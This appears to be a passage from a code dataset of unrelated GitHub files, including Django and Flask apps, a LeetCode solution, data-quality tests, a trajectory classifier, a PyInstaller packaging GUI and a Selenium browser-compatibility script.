trailer_youtube_url='https://www.youtube.com/watch?v=5bP1f_1o-zo',\n rating=5))\n movie_list.append(media.Movie(\n imdb_id='tt0120657',\n trailer_youtube_url='https://www.youtube.com/watch?v=JYUBKcurY88',\n rating=4))\n movie_list.append(media.Movie(\n imdb_id='tt0416449',\n trailer_youtube_url='https://www.youtube.com/watch?v=UrIbxk7idYA',\n rating=5))\n movie_list.append(media.Movie(\n imdb_id='tt1790885',\n trailer_youtube_url='https://www.youtube.com/watch?v=k7R2uVZYebE',\n rating=5))\n movie_list.append(media.Movie(\n imdb_id='tt0119698',\n trailer_youtube_url='https://www.youtube.com/watch?v=4OiMOHRDs14',\n rating=5))\n print(\"Done!\")\n return movie_list\n","repo_name":"jasonvanbiezen/p1_fresh_tomatoes","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34076806238","text":"\"\"\"\n这道题的关键点在于发现如下规律:\n设k为从大到小第k个,\n第n为的数值a一定等于 :\n a = ceil (k/(n-1)!)\n\n该数所在的索引为止为:\na-1\n\"\"\"\n\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n import math\n res = ''\n num = [i+1 for i in range(n)]\n while len(num) > 0:\n t = math.ceil (k/math.factorial(len(num) - 1)) - 1\n k = k - math.factorial(len(num) - 1) * t\n res += str(num.pop(t))\n return res\n\nfoo = Solution()\nprint(foo.getPermutation(4,9))","repo_name":"Allen-C-Guan/Leetcode-Answer","sub_path":"python_part/Leetcode/others/math/60. Permutation Sequence/ans.py","file_name":"ans.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2996091627","text":"from django.shortcuts import render,redirect\nfrom . models import *\n# Create your views here.\ndef home(request):\n return render(request,'home.html')\ndef Product(request):\n category=CategoryModel.objects.all()\n context={'Category':category}\n return render(request,'adddproduct.html',context)\n\n\ndef AddCategory(request):\n if request.method == 'POST':\n categoryname=request.POST['Name']\n data = CategoryModel(Name=categoryname)\n data.save()\n print('added')\n # messages.info(request, 'New User Added')\n return redirect('home')\n\n\ndef CategoryPage(request):\n return render(request,'addcategory.html')\n\n\ndef AddProduct(request):\n if request.method=='POST':\n pprice=request.POST['Price']\n pdes=request.POST['Description']\n pqty=request.POST['Quantity']\n select=request.POST['select']\n category=CategoryModel.objects.get(id=select)\n data = ProductModel(Price=pprice,Description=pdes,Quantity=pqty,Category=category)\n \n data.save()\n print('added')\n return redirect('home')\n\n\ndef ProductDetails(request):\n Product_detail = ProductModel.objects.all()\n return render(request,'productdetail.html',{'product':Product_detail})\n\n\ndef Tables(request):\n category=CategoryModel.objects.all()\n Product=ProductModel.objects.all()\n return render(request,'table.html',{'cdata':category,'pdata':Product})\n \n","repo_name":"rashinrichu/Ecom","sub_path":"Product/Add_product/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"221908167","text":"from flask import Flask, jsonify, request, send_file, render_template, redirect, url_for\nfrom flask_socketio import SocketIO, emit\n\napp = Flask(__name__, template_folder=\"venv\\Templates\" , static_folder=\"static\")\napp.config['DEBUG'] = True\nsocketio = SocketIO(app)\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n if request.method == \"POST\":\n user = request.form.get('user')\n if user != \"\":\n return render_template(\"chat.html\", user=user)\n return render_template(\"base.html\")\n\n\n@socketio.on('joined_room')\ndef handle_new_connection(user):\n emit('joined_announcement', user, broadcast=True)\n\n\n@socketio.on('new_message')\ndef handle_new_message(data):\n emit('broadcast_message', data, broadcast=True)\n\n\nif __name__ == \"__main__\":\n socketio.run(app, host=\"0.0.0.0\")\n","repo_name":"kaankvrck/Python-Web","sub_path":"python_Chat_Flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18923075904","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport os\nimport shlex\nimport shutil\nimport subprocess\nimport zipfile\n\nBASEDIR = subprocess.check_output(shlex.split(\n 'git rev-parse --show-toplevel',\n)).strip()\nADAPTERDIR = os.path.join(BASEDIR, 'adapter')\nVERSIONPATH = os.path.join(ADAPTERDIR, 'version.txt')\n\n\ndef get_last_tag():\n \"\"\" Return latest tag from git. \"\"\"\n describe = subprocess.check_output(shlex.split(\n 'git describe',\n )).strip()\n last_tag = describe.split('-')[0]\n return last_tag\n\n\ndef do(command):\n \"\"\" Do command via subprocess and return result. \"\"\"\n return subprocess.call(shlex.split(command))\n\n\ndef checkout(tag=None):\n \"\"\" Checkout tag with git. \"\"\"\n if tag is None:\n do('git checkout master')\n do('git stash pop')\n else:\n do('git stash save')\n return do('git checkout {}'.format(tag))\n \n\ndef create_version_file(versionpath, version):\n \"\"\" Create a versionfile at filepath. \"\"\"\n with open(versionpath, 'w') as versionfile:\n versionfile.write('# version: {}\\n'.format(version))\n\n\ndef create_zipfile(zippath, zipdir):\n \"\"\" Create a zipfile at zippath and add zipdir to it. \"\"\"\n with zipfile.ZipFile(zippath, 'w', zipfile.ZIP_DEFLATED) as archivefile:\n for path, dirnames, filenames in os.walk(zipdir):\n for filename in filenames:\n if filename.endswith('.pyc'):\n continue\n archivefile.write(\n os.path.join(path, filename),\n os.path.join(os.path.basename(zipdir), filename),\n )\n\n\ndef main(*args, **kwargs):\n last_tag = get_last_tag()\n zippath = os.path.join(BASEDIR, 'adapter-{}.zip'.format(last_tag))\n if checkout(last_tag) == 0: # No errors\n create_version_file(versionpath=VERSIONPATH, version=last_tag)\n create_zipfile(zippath=zippath, zipdir=ADAPTERDIR)\n os.remove(VERSIONPATH)\n checkout()\n","repo_name":"nens/timeseries","sub_path":"adapter/ziprelease.py","file_name":"ziprelease.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16297401783","text":"file=open(\"Important_Places.tsv\",\"r\")\nfile.readline()\nPlaces=[]\nfor line in file:\n\tline=line.split(\" \")\n\tPlaces.append(line[0])\nPlaces=list(set(Places))\n#print Places\nfile=open(\"IN.csv\",\"r\")\noutputfile=open(\"Imp_Places_LatLon.csv\",\"w\")\nfor line in file:\n\tline=line.split(\",\")\n\tif line[2] in Places:\n\t\toutputfile.write(line[2]+\",\"+line[3]+\",\"+line[9]+\",\"+line[10]+\"\\n\")\n\n","repo_name":"SaiCharanRegunta/QGiS-python-Plugins","sub_path":"wiki_Extraction/Project_Plugin/LatLonImpPlacesConvert.py","file_name":"LatLonImpPlacesConvert.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41221408581","text":"import os\nimport logging\n\nfrom dataraven.connections import PostgresConnector\nfrom dataraven.data_quality_operators import SQLNullCheckOperator, SQLDuplicateCheckOperator, CustomSQLDQOperator,\\\n CSVNullCheckOperator, CSVSetDuplicateCheckOperator\n\n\ndef init_logging(logfile=\"example_test.log\"):\n # remove previous run log file\n if os.path.exists(logfile):\n os.remove(logfile)\n\n # create log message formatting\n format = \"%(asctime)s | %(name)s | %(levelname)s | \\n%(message)s\\n\"\n formatter = logging.Formatter(format)\n\n # create log level\n level = logging.DEBUG\n\n # create file handler\n handler = logging.FileHandler(logfile)\n\n # set log formatter and level\n handler.setFormatter(formatter)\n handler.setLevel(level)\n\n # create logger function\n logger = logging.getLogger(__name__)\n\n # set logger level and handler\n logger.setLevel(level)\n logger.addHandler(handler)\n return logger\n\n\ndef main():\n # initialize logging\n logger = init_logging().info\n\n # database connection credentials\n user = os.environ[\"user\"]\n password = os.environ[\"password\"]\n host = os.environ[\"host\"]\n dbname = os.environ[\"dbname\"]\n port = os.environ[\"port\"]\n\n # postgres database connector\n conn = PostgresConnector(user, password, host, dbname, port, logger=logger)\n\n # test thresholds\n threshold0 = 0\n threshold1 = 0.01\n threshold5 = 0.05\n threshold10 = 0.1\n\n ##### TEST ORDERS TABLE #####\n orders_from_clause = \"test_schema.Orders\"\n orders_where_clause = [\"date(order_ts) = '2020-09-08'\"]\n\n # test for duplicates\n orders_duplicates_test_column = \"id\"\n SQLDuplicateCheckOperator(conn, orders_from_clause, threshold0, orders_duplicates_test_column,\n where=orders_where_clause, logger=logger)\n\n # test multiple columns using one threshold\n orders_null_test_columns = (\"name\", \"product_id\", \"price\")\n SQLNullCheckOperator(conn, orders_from_clause, threshold0, *orders_null_test_columns,\n where=orders_where_clause, logger=logger)\n\n ##### TEST Contacts_table.csv #####\n\n #contacts_path = \"../test_data/Contacts_table.csv\"\n contacts_path = \"test_data/Contacts_table.csv\"\n\n # test first_name-last_name for duplicates\n contacts_duplicats_test_columns = (\"first_name\", \"last_name\")\n CSVSetDuplicateCheckOperator(contacts_path, threshold0, *contacts_duplicats_test_columns, logger=logger)\n\n # test email, state for null values\n contacts_null_columns = (\"email\", \"country\")\n contacts_null_threshold = {\"email\": threshold10, \"country\": 0.5}\n CSVNullCheckOperator(contacts_path, contacts_null_threshold, *contacts_null_columns, logger=logger)\n\n ##### TEST EARTHQUAKES TABLE #####\n # test magnitude is bounded above at 10\n magnitude_bounds_test_description = \"Earthquakes.magnitude should be less than 10\"\n magnitude_bounds_test_query = \"\"\"\n select\n case\n when measure > 0 then 'test_fail'\n else 'test_pass'\n end as result,\n measure,\n 0 as threshold\n from\n (select count(1) as measure\n from test_schema.Earthquakes\n where magnitude > 10)t\n \"\"\"\n CustomSQLDQOperator(conn, magnitude_bounds_test_query, magnitude_bounds_test_description, logger=logger)\n\n # test columns for blank values\n earthquakes_columns = (\"state\", \"epicenter\", \"date\", \"magnitude\")\n earthquake_null_thresholds = {\"state\": threshold0, \"epicenter\": threshold5, \"date\": threshold1,\n \"magnitude\": threshold0}\n earthquake_col_not_blank_description = \"\"\"{column} in table test_schema.Earthquakes should have fewer than \n {threshold} BLANK values.\"\"\"\n earthquake_col_not_blank_query = \"\"\"\n select \n case\n when measure is NULL then 'test_fail'\n when measure > {threshold} then 'test_fail'\n else 'test_pass'\n end as result,\n measure,\n {threshold} as threshold\n from\n (select \n case when rows_ > 0 then cast(blank_cnt as float) / rows_ end as measure\n from\n (select \n count(1) as rows_,\n sum(case when cast({column} as varchar) = '' then 1 else 0 end) as blank_cnt\n from test_schema.Earthquakes)t)tt\n \"\"\"\n CustomSQLDQOperator(\n conn,\n earthquake_col_not_blank_query,\n earthquake_col_not_blank_description,\n *earthquakes_columns,\n threshold=earthquake_null_thresholds,\n logger=logger\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Qbizinc/qbiz-data-raven-depricated","sub_path":"tests/example_test.py","file_name":"example_test.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"161700409","text":"from itertools import chain\n\nimport pytest\n\n\n@pytest.fixture\ndef report_data():\n return [\n { # User creation failed: user with error, no collector\n 'login': 'some_login1',\n 'error': 'some user error',\n },\n {\n # User created, collector error\n 'login': 'some_login1.5',\n 'collectors': [{\n 'status': 'some collector error',\n 'errors': 0,\n 'collected': 0,\n 'total': 0,\n }],\n },\n { # No errors, single collector\n 'login': 'some_login2',\n 'collectors': [\n {'errors': 5, 'collected': 6, 'total': 7},\n ],\n },\n { # No errors, multiple collectors\n 'login': 'some_login3',\n 'collectors': [\n {'errors': 5, 'collected': 6, 'total': 8},\n {'errors': 6, 'collected': 8, 'total': 3},\n {'errors': 7, 'collected': 9, 'total': 1},\n ],\n }\n ]\n\n\n@pytest.fixture\nasync def setup_report_data(org_id, create_user, create_collector, report_data):\n for user_data in report_data:\n user = await create_user(org_id=org_id, login=user_data['login'], error=user_data.get('error'))\n for collector_data in user_data.get('collectors', []):\n await create_collector(\n user_id=user.user_id,\n errors=collector_data['errors'],\n collected=collector_data['collected'],\n total=collector_data['total'],\n status=collector_data.get('status', 'ok'),\n )\n\n\n@pytest.fixture\ndef expected_report_response(report_data):\n from mail.ipa.ipa.core.entities.enums import UserImportError\n return '\\r\\n'.join(chain(\n ['login,error,collected,total,errors'],\n [\n ','.join([\n user_data['login'],\n UserImportError.get_error(\n user_error=user_data.get('error'),\n collector_status=collector_data.get('status'),\n ).value,\n str(collector_data.get('collected', '')),\n str(collector_data.get('total', '')),\n str(collector_data.get('errors', '')),\n ])\n for user_data in report_data\n for collector_data in user_data.get('collectors', [{}])\n if user_data.get('error') is not None or collector_data.get('status', 'ok') != 'ok'\n ],\n [''],\n ))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/data/report_data.py","file_name":"report_data.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7635257650","text":"from classes.person import Person\nfrom classes.user import User\nfrom classes.school_lesson import School_Lesson\n\n\nclass School_Student(Person):\n def __init__(self, id=None):\n super().__init__()\n self._cursor = self._database_connection.cursor()\n\n if id is not None:\n self._id = id\n person, user = self.__fill_school_student(id=id) \n self._givenname = person._get_givenname()\n self._surname = person._get_surname()\n self._user = user\n else:\n pass\n\n def __fill_school_student(self, id):\n sql = f\"SELECT idperson, iddiscorduser FROM student WHERE idstudent={id}\"\n self._cursor.execute(sql)\n result = self._cursor.fetchone()\n return Person(id=result[0]), User(id=result[1])\n \n def _add_school_student_to_database(self, idperson, iduser):\n sql = f\"INSERT INTO student VALUES(null, {idperson}, {iduser})\"\n self._cursor.execute(sql)\n self._database_connection.commit()\n\n sql = \"SELECT LAST_INSERT_ID()\"\n self._cursor.execute(sql)\n return self._cursor.fetchone()[0]\n \n def _retrieve_student_by_userid(self, id):\n sql = f\"SELECT idstudent FROM student WHERE iddiscorduser={id}\"\n self._cursor.execute(sql)\n return self._cursor.fetchone()\n \n def _check_if_user_is_student(self, iduser):\n idstudent = self._retrieve_student_by_userid(id=iduser)[0]\n if idstudent is not None:\n return idstudent\n else:\n return None\n \n def _retrieve_attending_lessons(self):\n sql = f\"SELECT DISTINCT l.idlesson FROM student_has_lesson shl JOIN lesson l ON shl.idlesson=l.idlesson WHERE shl.idstudent={self._get_id()}\"\n self._cursor.execute(sql)\n result = self._cursor.fetchall()\n\n lessons = list()\n\n for idlesson in result:\n lessons.append(School_Lesson(id=idlesson[0]))\n\n return lessons\n\n def set_id(self, id):\n self._id = id\n \n def _get_id(self):\n return self._id\n","repo_name":"cube-m4st3r/class.discord-bot.py","sub_path":"src/classes/school_student.py","file_name":"school_student.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17212243886","text":"import pandas as pd\nfrom ast import literal_eval\nimport sys\nimport pdfcrowd\nimport gmplot\nimport math\nfrom dtw import dtw \nimport operator\n\ndef haversine_distance(origin, destination):\n\tradius = 6371 # FAA approved globe radius in km\n\tdlat = math.radians(destination[1]-origin[1])\n\tdlon = math.radians(destination[2]-origin[2])\n\ta = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(origin[1]))* math.cos(math.radians(destination[1])) * math.sin(dlon/2) * math.sin(dlon/2)\n\tc = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n\td = radius * c\n\treturn d\n\ndef FindNeig(trainingSet, testInstance, k=5):\n\tdistances = []\n\tfor x in range(len(trainingSet)):\n\t\t#print trainingSet[x][1]\n\t\tdist, cost, acc, path = dtw(trainingSet[x][1], testInstance, dist = haversine_distance)\n\t\tdistances.append((trainingSet[x][0], dist))\n\tdistances.sort(key=operator.itemgetter(1))\n\tneighbors = []\n\tfor x in range(k):\n\t\tneighbors.append(distances[x])\n\treturn neighbors\n\ndef Predict(neighbors):\n\tVotes = {}#majority voting \n\tw = 1\n\tfor x in range(len(neighbors)):\n\t\tresponse = neighbors[x][0]\n\t\tif response in Votes:#if it exists\n\t\t\t#Votes[response] += 1\n\t\t\tVotes[response] += (1/w)*neighbors[x][1]\n\t\telse:\n\t\t\t#Votes[response] =1\n\t\t\tVotes[response] = (1/w)*neighbors[x][1]\n\t\tw += 1\n\t#find the majority vote\n\tsortedVotes = sorted(Votes.iteritems(), key=operator.itemgetter(1), reverse=True)\n\treturn sortedVotes[0][0]\n\n\ntrainSet = pd.read_csv(\n'train_set.csv', # replace with the correct path\nconverters={\"Trajectory\": literal_eval},\nindex_col='tripId'\n)\n\ntestSet = pd.read_csv('test_set_a2.csv', converters={\"Trajectory\": literal_eval}, sep = '\\t')\ntempSet = testSet.as_matrix()\ntrainSetArr = trainSet.as_matrix()\n\n\ndata = {'Test_Trip_ID': [], 'Predicted_JourneyPatternID': []}\n \nfor i in range(len(tempSet)):\n\t#print tempSet[i][0]\n\tneig = FindNeig(trainSetArr,tempSet[i][0])\n\tprediction = Predict(neig)\n\tdata['Test_Trip_ID'].append(i)\n\tdata['Predicted_JourneyPatternID'].append(prediction)\n\ndf = pd.DataFrame(data, columns=['Test_Trip_ID', 'Predicted_JourneyPatternID'])\n\ndf.to_csv('testSet_JourneyPatternIDs.csv')\n\n\n\n","repo_name":"IliasBarmpar/Data-Mining-uni-course","sub_path":"2. Visualization, Dynamic Time Warping and Longest Common Subsequence/er_3.py","file_name":"er_3.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3330999224","text":"\r\nimport os\r\nimport tkinter as tk\r\nfrom pathlib import Path\r\nfrom tkinter import filedialog as fd\r\nfrom tkinter import messagebox\r\n\r\nwindow = tk.Tk() #初始化\r\nwindow.title(\"自动打包\") #设置标题\r\nwindow.geometry(\"330x200\")\r\nfile = ''\r\n图标_=''\r\ndef i():\r\n return os.path.join(os.path.expanduser('~'),\"Desktop\")\r\nfile1=i()\r\nfile1 = file1.rstrip()\r\ne_file = tk.Entry(window)\r\nw_file = tk.Entry(window)\r\nlabel_pixel= tk.Label(window, text='选择打包类型')\r\ndef mkdir(path):\r\n isExists=os.path.exists(path)\r\n if not isExists:\r\n # 如果不存在则创建目录\r\n # 创建目录操作函数\r\n os.makedirs(path) \r\n print (path+' 创建成功')\r\ndef askfile():\r\n global file\r\n file = fd.askopenfilename()\r\n e_file.delete(0,'end')\r\n e_file.insert(0,file)\r\ndef askfile1():\r\n global file1\r\n file1 = fd.askdirectory()\r\ndef askfile2():\r\n global 图标_\r\n 图标_ = fd.askopenfilename()\r\n w_file.delete(0,'end')\r\n w_file.insert(0,file)\r\ndef djalk():\r\n ttt=list_color.selection_get()\r\n os.system(f'pip install -i https://pypi.tuna.tsinghua.edu.cn/simple pyinstaller')\r\n file2=file1+'/exe文件所在地'\r\n mkdir(file2)\r\n if ttt=='有图标,隐藏界面':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F -w -i{图标_} {file}')\r\n elif ttt=='有图标':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F -i{图标_} {file}')\r\n elif ttt=='隐藏界面':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F -w {file}')\r\n elif ttt=='没有图标也不隐藏界面':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F {file}')\r\ndef gg():\r\n messagebox.showinfo('使用须知',\"\"\" \\t 自动打包器\r\n 使用须知:\r\n\\t2.0版本自动pip pyinstaller!!!!!\r\n\\tpip uninstall pyinstaller 可以用这个卸载pyinstaller试一试。\r\n\\t保存在 D:/要改自己改。\r\n\\t打包完成后然后会出现两个文件夹: 'build','dist'\r\n\\texe文件保存在'dist'当中。\r\n\\t需要等一个大约120秒。\r\n\\t请不要看到未响应就把它关了。\r\n\"\"\")\r\nb1 = tk.Button(window, text='点击开始转换',command=djalk)\r\nb2 = tk.Button(window, text='使用须知',command=gg)\r\nPicture_location = tk.Button(window,text=\"选择py文件位置\",command=askfile,cursor='hand2')\r\nPicture_location2 = tk.Button(window,text=r\"更改保存位置(默认是D:\\)\",command=askfile1,cursor='hand2')\r\nFilter = tk.Button(window,text=\"选择图标位置\",command=askfile2,cursor='hand2')\r\nlist_color = tk.Listbox(window, height=4)\r\nlist_color.insert('end', '有图标,隐藏界面')\r\nlist_color.insert('end', '有图标')\r\nlist_color.insert('end', '隐藏界面')\r\nlist_color.insert('end', '没有图标也不隐藏界面')\r\nPicture_location.grid(row=0,column=0,pady=5,padx=10)\r\ne_file.grid(row=1,column=0,pady=5,padx=10)\r\nFilter.grid(row=2,column=0,pady=5,padx=10)\r\nw_file.grid(row=3,column=0,pady=5,padx=10)\r\nlabel_pixel.grid(row=0,column=1)\r\nPicture_location2.grid(row=3,column=1)\r\nlist_color.grid(row=1,column=1,rowspan=2,pady=5,padx=10)\r\nb1.grid(row=5,column=1,pady=5,padx=10)\r\nb2.grid(row=5,column=0,pady=5,padx=10)\r\nwindow.mainloop()\r\n#\r\n\r\n","repo_name":"zhanghanGithub/-python-","sub_path":"自动打包2.0.py","file_name":"自动打包2.0.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37053845282","text":"\"\"\"\r\n\r\nCodes by Farhan\r\n\r\n\"\"\"\r\n\r\n## Regression Template ##\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\nds = pd.read_csv('Data.csv')\r\nX = ds.iloc[:, :-1].values\r\ny = ds.iloc[:, -1].values\r\n\r\n# Splitting the dataset into the Training set and Test set\r\n\"\"\"\r\nfrom sklearn.cross_validation import train_test_split\r\nX_train, X_test, y_train, y_test = \\\r\ntrain_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\"\"\"\r\n\r\n# Feature Scaling\r\n\"\"\"from sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\r\nsc_y = StandardScaler()\r\ny_train = sc_y.fit_transform(y_train)\"\"\"\r\n\r\n# Fitting the Regression Model to the dataset\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nregressor = PolynomialFeatures(degree = 4)\r\nX_poly = regressor.fit_transform(X)\r\n\r\nfrom sklearn.svm import SVR\r\nregressor = SVR(kernel = 'rbf')\r\n\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nregressor = DecisionTreeRegressor()\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nregressor = RandomForestRegressor(n_estimators = 100)\r\n\r\n\r\nregressor.fit(X,y)\r\n\r\n# Predicting a new result\r\ny_pred = regressor.predict(10)\r\n\r\n# In the case where we scaled the variables:\r\n\"\"\"\r\ny_pred = sc_y.inverse_transform(\r\n regressor.predict(sc_X.transform(np.array([[10]]))))\r\n\"\"\"\r\n\r\n# Visualising the Regression results \r\nX_grid = np.arange(min(X), max(X), 0.1)\r\nX_grid = X_grid.reshape((len(X_grid), 1))\r\nplt.scatter(X, y, color = 'red')\r\nplt.plot(X_grid, regressor.predict(X_grid), color = 'blue')\r\nplt.title('Title')\r\nplt.xlabel('Independent variable')\r\nplt.ylabel(list(ds)[-1])\r\nplt.show()","repo_name":"farhanchoudhary/Machine_Learning_A-Z_All_Codes_and_Templates","sub_path":"Annex. 1 - All Templates/Regression Template in Python.py","file_name":"Regression Template in Python.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"72"} +{"seq_id":"22008199336","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport time,sys,json\nfrom selenium import webdriver\nfrom installApplication_interface import *\n\ndef getJson(browserType,version):\n try:\n jsonPWD = \"./webdriverMap.json\"\n if os.path.exists(jsonPWD):\n with open(jsonPWD,\"r\") as load_f:\n load_dict = json.load(load_f)\n appPWD = os.getcwd()\n if platform.system() == \"Windows\":\n versionPWD = appPWD+load_dict[browserType][str(version)].replace(\"/\", \"\\\\\")\n else:\n versionPWD = appPWD + load_dict[browserType][str(version)]\n return versionPWD\n else:\n print('警告', '请将webdriverMap.json移到程序相同路径下')\n except:\n print('警告', 'json文件格式有问题或者键值对不存在')\ndef closeProcess(browserType):\n if browserType == \"macchrome\":\n os.system(\"ps -ef | grep \" + \"Google\" + \" | grep -v grep | awk '{print $2}' | xargs kill -9\")\n elif browserType == \"macfirefox\":\n os.system(\"ps -ef | grep \" + \"Firefox\" + \" | grep -v grep | awk '{print $2}' | xargs kill -9\")\n elif browserType == \"winchrome\":\n os.system(\"taskkill /f /im \" + \"Chrome\" + \".exe\")\n elif browserType == \"winfirefox\":\n os.system(\"taskkill /f /im \" + \"Firefox\" + \".exe\")\n\ndef openBrowser(browserType,version):\n webdriverPwd = getJson(browserType, version)\n closeProcess(browserType)\n driver =\"\"\n if browserType == \"macchrome\":\n os.environ[\"webdriver.Chrome.driver\"] = webdriverPwd\n\n macoption = webdriver.ChromeOptions()\n prefs = {'profile.default_content_setting_values.media_stream_camera': 1,\n 'profile.default_content_setting_values.media_stream_mic': 1,\n 'profile.default_content_setting_values.notifications': 1,\n 'profile.default_content_setting_values.geolocation': 1}\n macoption.add_experimental_option('prefs', prefs)\n driver = webdriver.Chrome(executable_path=webdriverPwd, chrome_options=macoption)\n printMy(driver.capabilities['version'])\n elif browserType == \"macfirefox\":\n os.environ[\"webdriver.Firefox.driver\"] = webdriverPwd\n macprofile = webdriver.FirefoxProfile()\n macprofile.set_preference('media.navigator.permission.disabled', True)\n macprofile.update_preferences()\n driver = webdriver.Firefox(executable_path=webdriverPwd, firefox_profile=macprofile)\n printMy(driver.capabilities['browserVersion'])\n elif browserType == \"winchrome\":\n os.environ[\"webdriver.Chrome.driver\"] = webdriverPwd\n winoption = webdriver.ChromeOptions()\n prefs = {'profile.default_content_setting_values.media_stream_camera': 1,\n 'profile.default_content_setting_values.media_stream_mic': 1,\n 'profile.default_content_setting_values.notifications': 1,\n 'profile.default_content_setting_values.geolocation': 1}\n winoption.add_experimental_option('prefs', prefs)\n driver = webdriver.Chrome(executable_path=webdriverPwd, chrome_options=winoption)\n printMy(driver.capabilities['version'])\n elif browserType == \"winfirefox\":\n os.environ[\"webdriver.Firefox.driver\"] = webdriverPwd\n winprofile = webdriver.FirefoxProfile()\n winprofile.set_preference('media.navigator.permission.disabled', True)\n winprofile.update_preferences()\n driver = webdriver.Firefox(executable_path=webdriverPwd, firefox_profile=winprofile)\n printMy(driver.capabilities['browserVersion'])\n return driver\n\ndef printMy(String):\n print('\\033[1;35m%s \\033[0m!'%String)\n\ndef testCase(browserType,version):\n driver = openBrowser(browserType,version)\n # pyautogui.press(\"enter\")\n driver.get(\n \"https://webdemo.agora.io/premium_rtc_test_2.5/show.html?channelName=asdsd&videoProfile=480p_4&uid=&uidtype=int&mode=live&codec=vp8&interop_mode=interop_commutication&avmode=0&dynamic=disabled&expiration=0&custom_key=&key=disabled&proxy=disabled&turnServerIP=113.207.108.198&udpPort=3478&tcpPort=3433&username=test&password=111111&forceTurn=disabled&nginxURL=webopt.agorabeckon.com&encrypt=disabled&encryptMode=none&encryptPassword=&preprocessing=disabled\")\n time.sleep(5)\n driver.quit()\n\ndef main(browserType,version):\n if browserType == \"macchrome\":\n uninstall_chrome_on_mac()\n install_chrome_on_mac(version)\n testCase(browserType,version)\n elif browserType == \"macfirefox\":\n uninstall_firefox_on_mac()\n install_firefox_on_mac(version)\n testCase(browserType, version)\n elif browserType == \"winchrome\":\n uninstall_chrome_on_win()\n install_chrome_on_win(version)\n testCase(browserType,version)\n elif browserType == \"winfirefox\":\n uninstall_firefox_on_win()\n install_firefox_on_win(version)\n testCase(browserType, version)\n\ndef runCom(jsonStr):\n jsonDict = eval(jsonStr)\n for key in jsonDict.keys():\n if isinstance(jsonDict[key], tuple):\n for version in jsonDict[key]:\n main(key, str(version))\n elif isinstance(jsonDict[key], int):\n main(key,str(jsonDict[key]))\n else:\n print(\"please send the version of int or tuple\")\n# if __name__ == '__main__':\n# # main(\"winchrome\",\"68\")\n# # main(\"winchrome\",\"69\")\n# # main(\"winfirefox\",\"63\")\n# # main(\"winfirefox\",\"64\")\n# # main(\"macchrome\",\"68\")\n# # main(\"macchrome\",\"69\")\n# # main(\"macfirefox\",\"63\")\n# # main(\"macfirefox\",\"64\")\n#\n# if len(sys.argv) < 2:\n# print('''run as: python3 browserCompatibility.py '{\"macchrome\": (10,11,12),\"macfirefox\": (50,51,52)}'\n# ''')\n# exit(1)\n# jsonStr = sys.argv[1]\n# print(jsonStr)\n# jsonDict = eval(jsonStr)\n# print(jsonDict)\n# for key in jsonDict.keys():\n# if isinstance(jsonDict[key], tuple):\n# for version in jsonDict[key]:\n# # main(key,version)\n# print(key,version)\n# elif isinstance(jsonDict[key], int):\n# print(jsonDict[key])\n# # main(key,jsonDict[key])\n# else:\n# print(\"please send the version of int or tuple\")\n\n\n# runCom('{\"winchrome\":(\"68\")}')","repo_name":"lisen886/CompatibilityTestSystem","sub_path":"browserCompatibility.py","file_name":"browserCompatibility.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20240987610","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n w1 = 